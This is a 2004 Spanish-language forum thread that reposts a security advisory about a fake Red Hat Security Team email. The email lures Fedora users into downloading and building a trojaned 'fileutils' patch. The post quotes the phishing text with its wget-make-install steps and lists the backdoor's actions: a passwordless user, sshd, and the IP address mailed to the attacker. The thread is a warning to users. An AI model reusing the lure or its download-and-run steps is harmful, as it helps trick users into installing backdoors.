Foros de daboweb

SEGURIDAD INFORMATICA, Firewall, parches, vacunas, antivirus, anti troyanos, spyware etc => Seguridad Informatica - Firewall - Virus - Troyanos - Spyware - Ad Aware - Malware => Mensaje iniciado por: Danae en 26 de Octubre de 2004, 07:21:22 pm

Título: Falso mensaje de alerta a usuarios de Red Hat Fedora
Publicado por: Danae en 26 de Octubre de 2004, 07:21:22 pm

Falso mensaje de alerta a usuarios de Red Hat Fedora[Publicado con autorización de Enciclopedia Virus]

Un mensaje falso que pretende ser enviado por Red Hat Security Team, ha estado circulando por Internet. El texto invita a los usuarios de Red Hat Fedora Linux, a descargar e instalar actualizaciones maliciosas, que pretenden comprometer la seguridad de sus equipos.

El mensaje contiene el siguiente texto:
Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to  execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT ed. The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

* First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.
Cuando el usuario descarga y ejecuta este parche, el troyano puede realizar las siguientes acciones:
1. Crear un usuario "bash" sin contraseña
2. Capturar la dirección IP y la hora de ejecución
3. Ejecutar SSHd
4. Enviar esta información a la dirección "root@addlebrain .com"

Más información:
Fedora-Redhat Fake Security Alert / Trojan Source Code & Analysis
http://www.k-otik.com/news/FakeRedhatPatchAnalysis.txt

(*) Este artículo, original de Enciclopedia Virus http://www.enciclopediavirus.com, es publicado en VSAntivirus.com con la respectiva autorización. Los derechos de republicación para su uso en otro medio, deberán solicitarse en http://www.enciclopediavirus.com/contacto/index.php

Artículo original:
www.enciclopediavirus.com/noticias/verNoticia.php?id=494
Publicado en: http://www.vsantivirus.com/ev-25-10-04.htm

Título: Falso mensaje de alerta a usuarios de Red Hat Fedora
Publicado por: destroyer en 26 de Octubre de 2004, 09:23:19 pm

Gracias danae.

un saludo

Título: Falso mensaje de alerta a usuarios de Red Hat Fedora
Publicado por: Dabo en 27 de Octubre de 2004, 12:18:39 am

ay ay aymi red hat  :wink: